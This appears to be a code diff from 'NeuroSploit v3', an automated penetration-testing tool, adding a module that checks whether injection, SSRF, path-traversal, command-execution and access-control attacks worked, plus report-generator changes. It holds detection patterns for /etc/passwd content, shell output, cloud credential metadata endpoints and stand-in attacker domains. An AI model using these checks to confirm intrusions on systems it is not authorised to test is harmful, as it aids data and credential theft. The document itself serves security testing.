"no_param", "(omitted)", attack_status, attack_length,
attack_hash, control_resp
)
results.append(result)
if result.same_behavior:
controls_matching += 1
except Exception as e:
logger.debug(f"Negative control (no_param) failed: {e}")
# Determine overall same_behavior
controls_run = len(results)
same_behavior = controls_matching > 0
# Build detail string
if same_behavior:
matching_types = [r.control_type for r in results if r.same_behavior]
detail = (f"NEGATIVE CONTROL FAILED: {controls_matching}/{controls_run} "
f"controls show same behavior as attack ({', '.join(matching_types)})")
else:
detail = f"Negative controls passed: 0/{controls_run} controls match attack response"
return NegativeControlResult(
same_behavior=same_behavior,
controls_run=controls_run,
controls_matching=controls_matching,
confidence_adjustment=-60 if same_behavior else 20,
results=results,
detail=detail,
)
async def _send_control(
self,
url: str,
param: str,
method: str,
value: str,
make_request_fn: Callable,
injection_point: str,
) -> Optional[Dict]:
"""Send a control request with the given value."""
if injection_point == "parameter":
return await make_request_fn(url, method, {param: value})
elif injection_point == "header":
# For header injection, we'd need to pass custom headers
# Fall back to parameter injection for control testing
return await make_request_fn(url, method, {param: value})
elif injection_point == "path":
# For path injection, append benign value to path
parsed = urlparse(url)
control_url = urlunparse(parsed._replace(
path=parsed.path.rstrip("/") + "/" + value
))
return await make_request_fn(control_url, method, {})
elif injection_point == "body":
return await make_request_fn(url, method, {param: value})
else:
return await make_request_fn(url, method, {param: value})
async def _send_without_param(
self,
url: str,
param: str,
method: str,
make_request_fn: Callable,
) -> Optional[Dict]:
"""Send request without the tested parameter."""
# Strip the param from URL query string if present
parsed = urlparse(url)
if parsed.query:
params = parse_qs(parsed.query, keep_blank_values=True)
params.pop(param, None)
new_query = urlencode(params, doseq=True)
clean_url = urlunparse(parsed._replace(query=new_query))
else:
clean_url = url
return await make_request_fn(clean_url, method, {})
def _compare_responses(
self,
control_type: str,
control_value: str,
attack_status: int,
attack_length: int,
attack_hash: str,
control_response: Dict,
) -> ControlTestResult:
"""Compare a control response against the attack response."""
control_status = control_response.get("status", 0)
control_body = control_response.get("body", "")
control_length = len(control_body)
control_hash = hashlib.md5(
control_body.encode("utf-8", errors="replace")
).hexdigest()
# Status code match
status_match = (attack_status == control_status)
# Body hash exact match
hash_match = (attack_hash == control_hash)
# Body length similarity
if attack_length == 0 and control_length == 0:
length_similar = True
elif attack_length == 0 or control_length == 0:
length_similar = False
else:
diff_pct = abs(attack_length - control_length) / max(attack_length, 1) * 100
length_similar = diff_pct <= self.LENGTH_THRESHOLD_PCT
# Same behavior if status matches AND (exact hash match OR length similar)
same_behavior = status_match and (hash_match or length_similar)
detail = (f"{control_type}('{control_value[:30]}'): "
f"status {'=' if status_match else '!'}= {control_status}, "
f"len {control_length} "
f"({'same' if length_similar else 'different'} from {attack_length})"
f"{', EXACT MATCH' if hash_match else ''}")
return ControlTestResult(
control_type=control_type,
control_value=control_value[:50],
status_match=status_match,
length_similar=length_similar,
hash_match=hash_match,
same_behavior=same_behavior,
detail=detail,
)
File diff suppressed because it is too large Load Diff
+873
View File
@@ -0,0 +1,873 @@
"""
NeuroSploit v3 - Proof of Execution Framework
Per-vulnerability-type verification that a payload was actually PROCESSED
by the application, not just reflected or ignored. Each vuln type has specific
proof requirements — a finding without proof of execution scores 0.
This replaces the fragmented evidence checking in _cross_validate_ai_claim()
and _strict_technical_verify() with a unified, per-type proof system.
"""
import re
import logging
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Shared patterns (from response_verifier.py)
# ---------------------------------------------------------------------------
DB_ERROR_PATTERNS = [
r"(?:sql|database|query)\s*(?:error|syntax|exception)",
r"mysql_(?:fetch|query|num_rows|connect)",
r"mysqli_",
r"pg_(?:query|exec|prepare|connect)",
r"sqlite3?\.\w+error",
r"ora-\d{4,5}",
r"mssql_query",
r"sqlstate\[",
r"odbc\s+driver",
r"jdbc\s+exception",
r"unclosed\s+quotation",
r"you have an error in your sql",
r"syntax error.*at line \d+",
]
FILE_CONTENT_MARKERS = [
"root:x:0:0:",
"daemon:x:1:1:",
"bin:x:2:2:",
"www-data:",
"[boot loader]",
"[operating systems]",
"[extensions]",
]
COMMAND_OUTPUT_PATTERNS = [
r"uid=\d+\(",
r"gid=\d+\(",
r"root:\w+:0:0:",
r"/bin/(?:ba)?sh",
r"Linux\s+\S+\s+\d+\.\d+",
]
SSTI_EXPRESSIONS = {
"7*7": "49",
"7*'7'": "7777777",
"3*3": "9",
}
# Cloud metadata markers for SSRF
SSRF_METADATA_MARKERS = [
"ami-id", "ami-launch-index", "instance-id", "instance-type",
"local-hostname", "local-ipv4", "public-hostname", "public-ipv4",
"security-groups", "iam/info", "iam/security-credentials",
"computeMetadata/v1", "metadata.google.internal",
"169.254.169.254", # Only if actual metadata content follows
]
# Internal content markers for SSRF
SSRF_INTERNAL_MARKERS = [
"root:x:0:0:", # /etc/passwd via SSRF
"localhost", # Internal service response
"127.0.0.1",
"internal server",
"private network",
]
# ---------------------------------------------------------------------------
# Result type
# ---------------------------------------------------------------------------
@dataclass
class ProofResult:
"""Result of proof-of-execution check."""
proven: bool # Was execution proven?
proof_type: str # Type of proof found (e.g., "db_error", "xss_auto_fire")
detail: str # Human-readable description
score: int # Confidence score contribution (0-60)
impact_demonstrated: bool = False # Was impact beyond mere detection shown?
# ---------------------------------------------------------------------------
# Proof Engine
# ---------------------------------------------------------------------------
_compiled_db_errors = [re.compile(p, re.IGNORECASE) for p in DB_ERROR_PATTERNS]
_compiled_cmd_patterns = [re.compile(p, re.IGNORECASE) for p in COMMAND_OUTPUT_PATTERNS]
class ProofOfExecution:
"""Per-vulnerability-type proof that the payload was executed/processed.
Each vuln type has specific criteria. If the proof method returns
score=0, the finding has NO proof of execution and should score low.
"""
def check(self, vuln_type: str, payload: str, response: Dict,
baseline: Optional[Dict] = None) -> ProofResult:
"""Check for proof of execution for the given vulnerability type.
Args:
vuln_type: Vulnerability type key
payload: The attack payload used
response: HTTP response dict {status, headers, body}
baseline: Optional baseline response for comparison
Returns:
ProofResult with proven flag, proof type, detail, and score
"""
body = response.get("body", "")
status = response.get("status", 0)
headers = response.get("headers", {})
# Route to type-specific proof method
method_name = f"_proof_{vuln_type}"
if not hasattr(self, method_name):
# Try base type (e.g., sqli_error -> sqli)
base = vuln_type.split("_")[0]
method_name = f"_proof_{base}"
if not hasattr(self, method_name):
return self._proof_default(vuln_type, payload, body, status,
headers, baseline)
return getattr(self, method_name)(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# XSS Proofs
# ------------------------------------------------------------------
def _proof_xss(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_xss_reflected(payload, body, status, headers, baseline)
def _proof_xss_reflected(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""XSS proof: payload in executable/interactive HTML context."""
if not payload or not body:
return ProofResult(False, "", "No payload or body", 0)
# Check if payload is reflected at all
if payload not in body and payload.lower() not in body.lower():
return ProofResult(False, "not_reflected",
"Payload not reflected in response", 0)
# Use XSS context analyzer for definitive proof
try:
from backend.core.xss_context_analyzer import analyze_xss_execution_context
ctx = analyze_xss_execution_context(body, payload)
if ctx["executable"]:
return ProofResult(
True, "xss_auto_fire",
f"Payload in auto-executing context: {ctx['detail']}",
60, impact_demonstrated=True
)
if ctx["interactive"]:
return ProofResult(
True, "xss_interactive",
f"Payload in interactive context: {ctx['detail']}",
40, impact_demonstrated=False
)
except ImportError:
pass
# Fallback: raw reflection without context analysis
return ProofResult(
False, "reflected_only",
"Payload reflected but context not confirmed executable",
10
)
def _proof_xss_stored(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Stored XSS: same as reflected but requires payload on display page."""
return self._proof_xss_reflected(payload, body, status, headers, baseline)
def _proof_xss_dom(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""DOM XSS: payload in DOM sink (harder to verify without browser)."""
return self._proof_xss_reflected(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# SQLi Proofs
# ------------------------------------------------------------------
def _proof_sqli(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""SQLi proof: DB error message caused by payload."""
body_lower = body.lower()
# Check for DB error patterns
for pat in _compiled_db_errors:
m = pat.search(body_lower)
if m:
# Verify error wasn't in baseline
if baseline:
baseline_body = baseline.get("body", "").lower()
if pat.search(baseline_body):
continue # Error exists in baseline — not induced
return ProofResult(
True, "db_error",
f"SQL error induced: {m.group()[:80]}",
60, impact_demonstrated=True
)
# Check for boolean-based blind: significant response diff
if baseline:
baseline_len = len(baseline.get("body", ""))
body_len = len(body)
baseline_status = baseline.get("status", 0)
if status != baseline_status and body_len != baseline_len:
diff_pct = abs(body_len - baseline_len) / max(baseline_len, 1) * 100
if diff_pct > 30:
return ProofResult(
True, "boolean_diff",
f"Boolean-based blind: {diff_pct:.0f}% response diff "
f"(status {baseline_status}->{status})",
50, impact_demonstrated=False
)
return ProofResult(False, "", "No SQL error or boolean diff detected", 0)
def _proof_sqli_error(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_sqli(payload, body, status, headers, baseline)
def _proof_sqli_union(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_sqli(payload, body, status, headers, baseline)
def _proof_sqli_blind(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_sqli(payload, body, status, headers, baseline)
def _proof_sqli_time(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Time-based SQLi: needs external timing measurement (lower score)."""
# Time-based proof requires timing data not available in response alone
# The timeout exception handler in the agent provides this signal
if status == 0: # Timeout
return ProofResult(
True, "time_based",
"Request timeout consistent with time-based injection",
40, impact_demonstrated=False
)
return ProofResult(False, "", "No timing anomaly detected", 0)
# ------------------------------------------------------------------
# SSRF Proofs
# ------------------------------------------------------------------
def _proof_ssrf(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""SSRF proof: response contains actual internal/cloud resource content.
IMPORTANT: Status/length diff alone is NOT proof of SSRF.
Must show actual internal resource content.
"""
body_lower = body.lower()
# Check for cloud metadata content
metadata_found = []
for marker in SSRF_METADATA_MARKERS:
if marker.lower() in body_lower:
# Additional check: marker must NOT be in baseline
if baseline:
baseline_lower = baseline.get("body", "").lower()
if marker.lower() in baseline_lower:
continue
metadata_found.append(marker)
if len(metadata_found) >= 2:
# Multiple metadata fields = strong SSRF proof
return ProofResult(
True, "cloud_metadata",
f"Cloud metadata content: {', '.join(metadata_found[:5])}",
60, impact_demonstrated=True
)
if len(metadata_found) == 1:
return ProofResult(
True, "partial_metadata",
f"Partial metadata: {metadata_found[0]}",
40, impact_demonstrated=False
)
# Check for /etc/passwd via SSRF
for marker in FILE_CONTENT_MARKERS:
if marker.lower() in body_lower:
if baseline:
if marker.lower() in baseline.get("body", "").lower():
continue
return ProofResult(
True, "internal_file",
f"Internal file content via SSRF: {marker}",
60, impact_demonstrated=True
)
# Status/length diff alone is NOT SSRF proof
return ProofResult(
False, "",
"No internal resource content found (status/length diff alone is insufficient)",
0
)
def _proof_ssrf_cloud(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_ssrf(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# LFI / Path Traversal Proofs
# ------------------------------------------------------------------
def _proof_lfi(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""LFI proof: actual file content markers in response."""
body_lower = body.lower()
for marker in FILE_CONTENT_MARKERS:
if marker.lower() in body_lower:
if baseline:
if marker.lower() in baseline.get("body", "").lower():
continue # Marker in baseline
return ProofResult(
True, "file_content",
f"File content marker: {marker}",
60, impact_demonstrated=True
)
return ProofResult(False, "", "No file content markers found", 0)
def _proof_path_traversal(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_lfi(payload, body, status, headers, baseline)
def _proof_path(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_lfi(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# SSTI Proofs
# ------------------------------------------------------------------
def _proof_ssti(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""SSTI proof: template expression was evaluated."""
for expr, result in SSTI_EXPRESSIONS.items():
if expr in (payload or ""):
if result in body and expr not in body:
return ProofResult(
True, "expression_evaluated",
f"Template expression {expr}={result} evaluated",
60, impact_demonstrated=True
)
return ProofResult(False, "", "No template expression evaluation detected", 0)
# ------------------------------------------------------------------
# RCE / Command Injection Proofs
# ------------------------------------------------------------------
def _proof_rce(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""RCE proof: command output markers in response."""
for pat in _compiled_cmd_patterns:
m = pat.search(body)
if m:
if baseline:
if pat.search(baseline.get("body", "")):
continue
return ProofResult(
True, "command_output",
f"Command output: {m.group()[:80]}",
60, impact_demonstrated=True
)
return ProofResult(False, "", "No command output markers found", 0)
def _proof_command(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_rce(payload, body, status, headers, baseline)
def _proof_command_injection(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_rce(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# Open Redirect Proofs
# ------------------------------------------------------------------
def _proof_open(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_open_redirect(payload, body, status, headers, baseline)
def _proof_open_redirect(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Open redirect proof: Location header points to attacker-controlled domain."""
if status not in (301, 302, 303, 307, 308):
return ProofResult(False, "", "No redirect status code", 0)
location = headers.get("Location", headers.get("location", ""))
if not location:
return ProofResult(False, "", "No Location header", 0)
# Check if Location contains the injected external domain
if payload and any(domain in location.lower() for domain in
["evil.com", "attacker.com", "example.com"]
if domain in payload.lower()):
return ProofResult(
True, "redirect_to_external",
f"Redirect to attacker domain: {location[:200]}",
60, impact_demonstrated=True
)
# Protocol-relative redirect
if location.startswith("//") and any(
domain in location for domain in ["evil.com", "attacker.com"]
if domain in (payload or "")
):
return ProofResult(
True, "protocol_relative_redirect",
f"Protocol-relative redirect: {location[:200]}",
60, impact_demonstrated=True
)
# Meta-refresh redirect in body
meta_pattern = r'<meta[^>]*http-equiv=["\']refresh["\'][^>]*url=([^"\'>\s]+)'
meta_match = re.search(meta_pattern, body, re.IGNORECASE)
if meta_match:
redirect_url = meta_match.group(1)
if any(domain in redirect_url.lower() for domain in
["evil.com", "attacker.com"] if domain in (payload or "").lower()):
return ProofResult(
True, "meta_refresh_redirect",
f"Meta-refresh redirect: {redirect_url[:200]}",
30, impact_demonstrated=False
)
return ProofResult(False, "", "No external redirect detected", 0)
# ------------------------------------------------------------------
# CRLF / Header Injection Proofs
# ------------------------------------------------------------------
def _proof_crlf(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_crlf_injection(payload, body, status, headers, baseline)
def _proof_crlf_injection(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""CRLF proof: injected header appears in response headers."""
injected_header_names = ["X-Injected", "X-CRLF-Test", "Set-Cookie"]
for hdr_name in injected_header_names:
if hdr_name.lower() in (payload or "").lower():
val = headers.get(hdr_name, headers.get(hdr_name.lower(), ""))
if val and ("injected" in val.lower() or "crlf" in val.lower()
or "test" in val.lower()):
return ProofResult(
True, "header_injected",
f"Injected header: {hdr_name}: {val[:100]}",
60, impact_demonstrated=True
)
return ProofResult(False, "", "No injected headers found", 0)
def _proof_header(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_crlf_injection(payload, body, status, headers, baseline)
def _proof_header_injection(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_crlf_injection(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# XXE Proofs
# ------------------------------------------------------------------
def _proof_xxe(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""XXE proof: file content or SSRF response from entity expansion."""
body_lower = body.lower()
for marker in FILE_CONTENT_MARKERS:
if marker.lower() in body_lower:
if baseline and marker.lower() in baseline.get("body", "").lower():
continue
return ProofResult(
True, "xxe_file_read",
f"XXE entity expansion: {marker}",
60, impact_demonstrated=True
)
# XXE SSRF: metadata markers
for marker in SSRF_METADATA_MARKERS:
if marker.lower() in body_lower:
if baseline and marker.lower() in baseline.get("body", "").lower():
continue
return ProofResult(
True, "xxe_ssrf",
f"XXE SSRF: {marker}",
60, impact_demonstrated=True
)
return ProofResult(False, "", "No XXE entity expansion detected", 0)
# ------------------------------------------------------------------
# NoSQL Injection Proofs
# ------------------------------------------------------------------
def _proof_nosql(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_nosql_injection(payload, body, status, headers, baseline)
def _proof_nosql_injection(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""NoSQL injection proof: MongoDB/NoSQL error or boolean response diff."""
body_lower = body.lower()
nosql_errors = [
r"MongoError", r"mongo.*(?:syntax|parse|query).*error",
r"BSONTypeError", r"CastError.*ObjectId",
]
for pat_str in nosql_errors:
m = re.search(pat_str, body, re.IGNORECASE)
if m:
if baseline and re.search(pat_str, baseline.get("body", ""), re.IGNORECASE):
continue
return ProofResult(
True, "nosql_error",
f"NoSQL error: {m.group()[:80]}",
60, impact_demonstrated=True
)
# Boolean-based blind NoSQL
if baseline and ("$gt" in (payload or "") or "$ne" in (payload or "")):
baseline_len = len(baseline.get("body", ""))
diff_pct = abs(len(body) - baseline_len) / max(baseline_len, 1) * 100
if diff_pct > 20:
return ProofResult(
True, "nosql_boolean",
f"NoSQL boolean diff: {diff_pct:.0f}%",
45, impact_demonstrated=False
)
return ProofResult(False, "", "No NoSQL error or boolean diff", 0)
# ------------------------------------------------------------------
# IDOR Proofs
# ------------------------------------------------------------------
def _proof_idor(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""IDOR proof: accessing another user's resource with data comparison.
CRITICAL: HTTP status codes are NOT reliable for access control.
We verify by checking actual response DATA, not just status/length.
"""
return self._proof_access_control(payload, body, status, headers, baseline, "idor")
def _proof_bola(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""BOLA proof: API object-level authorization with data comparison."""
return self._proof_access_control(payload, body, status, headers, baseline, "bola")
def _proof_bfla(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""BFLA proof: function-level authorization with data comparison."""
return self._proof_access_control(payload, body, status, headers, baseline, "bfla")
def _proof_privilege_escalation(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Privilege escalation proof with data comparison."""
return self._proof_access_control(payload, body, status, headers, baseline, "privilege_escalation")
def _proof_auth_bypass(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Auth bypass proof: verify authenticated content is actually returned."""
return self._proof_access_control(payload, body, status, headers, baseline, "auth_bypass")
def _proof_forced_browsing(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Forced browsing proof with data comparison."""
return self._proof_access_control(payload, body, status, headers, baseline, "forced_browsing")
def _proof_access_control(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict],
vuln_subtype: str) -> ProofResult:
"""Unified access control proof with smart data comparison.
NEVER trusts status codes alone. Checks:
1. Response body is NOT an error/empty/login page (false positive indicators)
2. Response body contains ACTUAL data (JSON objects, user fields, etc.)
3. Response body DIFFERS from baseline (different user's data)
4. Response body does NOT contain denial indicators
"""
body_lower = body.lower().strip()
body_len = len(body)
# ------- FALSE POSITIVE: Empty or trivially small response -------
if body_len < 10:
return ProofResult(False, "", "Empty response body — no data returned", 0)
# ------- FALSE POSITIVE: Error/denial messages in body -------
denial_indicators = [
"unauthorized", "forbidden", "access denied", "not authorized",
"permission denied", "authentication required", "login required",
"please log in", "please sign in", "invalid token", "token expired",
"session expired", "not found", "does not exist", "no permission",
"insufficient privileges", "you do not have access",
'"error":', '"status":"error"', '"success":false', '"success": false',
]
denial_count = sum(1 for d in denial_indicators if d in body_lower)
if denial_count >= 2:
return ProofResult(
False, "",
f"Response contains {denial_count} denial indicators — access was denied despite status {status}",
0
)
# ------- FALSE POSITIVE: Login/redirect page -------
login_indicators = [
"<form", "type=\"password\"", "type='password'",
'name="password"', "name='password'",
"sign in", "log in", "login", "<title>login",
]
login_count = sum(1 for l in login_indicators if l in body_lower)
if login_count >= 3:
return ProofResult(
False, "",
f"Response appears to be a login page ({login_count} login indicators)",
0
)
# ------- POSITIVE: Check for actual data content -------
data_indicators = [
# JSON data fields (common in API responses)
'"email":', '"name":', '"username":', '"phone":', '"address":',
'"role":', '"balance":', '"password":', '"token":', '"secret":',
'"orders":', '"items":', '"created_at":', '"updated_at":',
'"first_name":', '"last_name":', '"profile":', '"account":',
# HTML data (for web pages)
"user-profile", "account-details", "order-history",
]
data_count = sum(1 for d in data_indicators if d in body_lower)
# ------- Compare with baseline if available -------
if baseline:
baseline_body = baseline.get("body", "")
baseline_len = len(baseline_body)
# If response is nearly identical to baseline, likely same-behavior
if baseline_len > 0:
diff_pct = abs(body_len - baseline_len) / max(baseline_len, 1) * 100
baseline_lower = baseline_body.lower().strip()
# Check if body content actually differs (not just length)
if body_lower == baseline_lower:
return ProofResult(
False, "",
"Response identical to baseline — server ignores the ID parameter",
0
)
# Content-based comparison: for access control vulns,
# different users have similar-length responses but different data
# Count how many data field VALUES differ between attack and baseline
content_diff_score = self._compare_data_content(body, baseline_body)
# Strong content difference with data indicators
if content_diff_score >= 3 and data_count >= 2:
return ProofResult(
True, f"{vuln_subtype}_data_diff",
f"Different data content returned ({content_diff_score} field values differ, "
f"{data_count} data fields found) — likely another user's data",
40, impact_demonstrated=True
)
# Significant length difference with data indicators
if diff_pct > 10 and data_count >= 2:
return ProofResult(
True, f"{vuln_subtype}_data_diff",
f"Different data returned ({diff_pct:.0f}% content diff, "
f"{data_count} data fields found) — likely another user's data",
40, impact_demonstrated=True
)
# Moderate content or length difference
if (content_diff_score >= 2 or diff_pct > 5) and data_count >= 1:
return ProofResult(
True, f"{vuln_subtype}_content_diff",
f"Content differs from baseline ({content_diff_score} values differ, "
f"{diff_pct:.0f}% len diff, {data_count} data fields) — possible cross-user access",
30, impact_demonstrated=False
)
# No baseline — check if response has meaningful data
if data_count >= 3:
return ProofResult(
True, f"{vuln_subtype}_data_present",
f"Response contains {data_count} data fields (no baseline for comparison)",
25, impact_demonstrated=False
)
if data_count >= 1 and status == 200 and denial_count == 0:
return ProofResult(
True, f"{vuln_subtype}_possible",
f"Response has data ({data_count} fields) and no denial — needs manual verification",
15, impact_demonstrated=False
)
return ProofResult(
False, "",
f"Cannot verify {vuln_subtype}: {data_count} data fields, "
f"{denial_count} denial indicators, status {status}",
0
)
@staticmethod
def _compare_data_content(body_a: str, body_b: str) -> int:
"""Compare two response bodies for data-level differences.
Extracts JSON-like key:value pairs and counts how many values differ
between the two responses. This is essential for access control testing
where response LENGTHS are similar but the actual DATA differs
(e.g., different user profiles).
Returns number of differing field values (0 = identical data).
"""
import json as _json
# Try JSON parsing first
try:
data_a = _json.loads(body_a)
data_b = _json.loads(body_b)
if isinstance(data_a, dict) and isinstance(data_b, dict):
diff_count = 0
all_keys = set(data_a.keys()) | set(data_b.keys())
for key in all_keys:
val_a = str(data_a.get(key, ""))
val_b = str(data_b.get(key, ""))
if val_a != val_b:
diff_count += 1
return diff_count
except (ValueError, TypeError):
pass
# Fallback: regex-based extraction of "key":"value" pairs
kv_pattern = re.compile(r'"(\w+)":\s*"([^"]*)"')
pairs_a = dict(kv_pattern.findall(body_a))
pairs_b = dict(kv_pattern.findall(body_b))
if not pairs_a and not pairs_b:
# Not JSON-like; do simple line-level comparison
lines_a = set(body_a.strip().splitlines())
lines_b = set(body_b.strip().splitlines())
return len(lines_a.symmetric_difference(lines_b))
all_keys = set(pairs_a.keys()) | set(pairs_b.keys())
return sum(1 for k in all_keys if pairs_a.get(k) != pairs_b.get(k))
# ------------------------------------------------------------------
# Host Header Injection
# ------------------------------------------------------------------
def _proof_host(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_host_header_injection(payload, body, status, headers, baseline)
def _proof_host_header_injection(self, payload: str, body: str, status: int,
headers: Dict,
baseline: Optional[Dict]) -> ProofResult:
"""Host header injection: injected host reflected in response body/links."""
evil_hosts = ["evil.com", "attacker.com", "injected.host"]
body_lower = body.lower()
for host in evil_hosts:
if host in (payload or "").lower() and host in body_lower:
if baseline and host in baseline.get("body", "").lower():
continue
return ProofResult(
True, "host_reflected",
f"Injected host '{host}' reflected in response",
50, impact_demonstrated=False
)
return ProofResult(False, "", "Injected host not reflected", 0)
# ------------------------------------------------------------------
# Inspection types (no execution proof needed)
# ------------------------------------------------------------------
def _proof_security(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_cors(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_clickjacking(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_directory(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_debug(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_information(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_insecure(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_inspection(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Inspection types: proof is the header/config itself being present/absent."""
return ProofResult(
True, "inspection",
"Inspection-type finding — proof is configuration state",
50, impact_demonstrated=False
)
# ------------------------------------------------------------------
# Default / Unknown types
# ------------------------------------------------------------------
def _proof_default(self, vuln_type: str, payload: str, body: str,
status: int, headers: Dict,
baseline: Optional[Dict]) -> ProofResult:
"""Default: conservative scoring for unknown vuln types."""
# Check basic payload effect (reflected + different from baseline)
if payload and payload.lower() in body.lower():
if baseline:
baseline_body = baseline.get("body", "")
if payload.lower() not in baseline_body.lower():
return ProofResult(
True, "payload_reflected",
f"Payload reflected (not in baseline) for {vuln_type}",
25, impact_demonstrated=False
)
return ProofResult(
False, "reflected_no_baseline",
f"Payload reflected but no baseline to compare for {vuln_type}",
10
)
return ProofResult(
False, "",
f"No proof of execution for {vuln_type}",
0
)
+439 -18
View File
@@ -1,8 +1,10 @@
"""
NeuroSploit v3 - Report Generator
Generates professional HTML, PDF, and JSON reports.
Generates professional HTML, PDF, and JSON reports
with OHVR structure and embedded screenshots.
"""
import base64
import json
from datetime import datetime
from pathlib import Path
@@ -23,8 +25,12 @@ class ReportGenerator:
"info": "#6c757d"
}
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}
def __init__(self):
self.reports_dir = settings.REPORTS_DIR
self._scan_id: Optional[str] = None
self._tool_executions: List = []
async def generate(
self,
@@ -34,7 +40,8 @@ class ReportGenerator:
title: Optional[str] = None,
include_executive_summary: bool = True,
include_poc: bool = True,
include_remediation: bool = True
include_remediation: bool = True,
tool_executions: Optional[List] = None,
) -> Tuple[Path, str]:
"""
Generate a report.
@@ -42,6 +49,8 @@ class ReportGenerator:
Returns:
Tuple of (file_path, executive_summary)
"""
self._scan_id = str(scan.id) if scan else None
self._tool_executions = tool_executions or []
title = title or f"Security Assessment Report - {scan.name}"
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
@@ -69,12 +78,94 @@ class ReportGenerator:
else:
raise ValueError(f"Unsupported format: {format}")
# Save report
file_path = self.reports_dir / filename
# Save report in a per-report folder with screenshots
report_dir = self.reports_dir / f"report_{timestamp}"
report_dir.mkdir(parents=True, exist_ok=True)
file_path = report_dir / filename
file_path.write_text(content)
# Copy screenshots into the report folder
self._copy_screenshots_to_report(vulnerabilities, report_dir)
return file_path, executive_summary
async def generate_ai_report(
self,
scan: Scan,
vulnerabilities: List[Vulnerability],
tool_executions: Optional[List] = None,
title: Optional[str] = None,
) -> Tuple[Path, str]:
"""Generate an AI-enhanced report with LLM-written executive summary and per-finding analysis."""
from core.llm_manager import LLMManager
self._scan_id = str(scan.id) if scan else None
self._tool_executions = tool_executions or []
title = title or f"AI Security Assessment Report - {scan.name}"
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
# Build findings context for AI
findings_context = []
for v in vulnerabilities:
findings_context.append(
f"- [{v.severity.upper()}] {v.title}: {v.vulnerability_type} at "
f"{v.affected_endpoint or 'N/A'}"
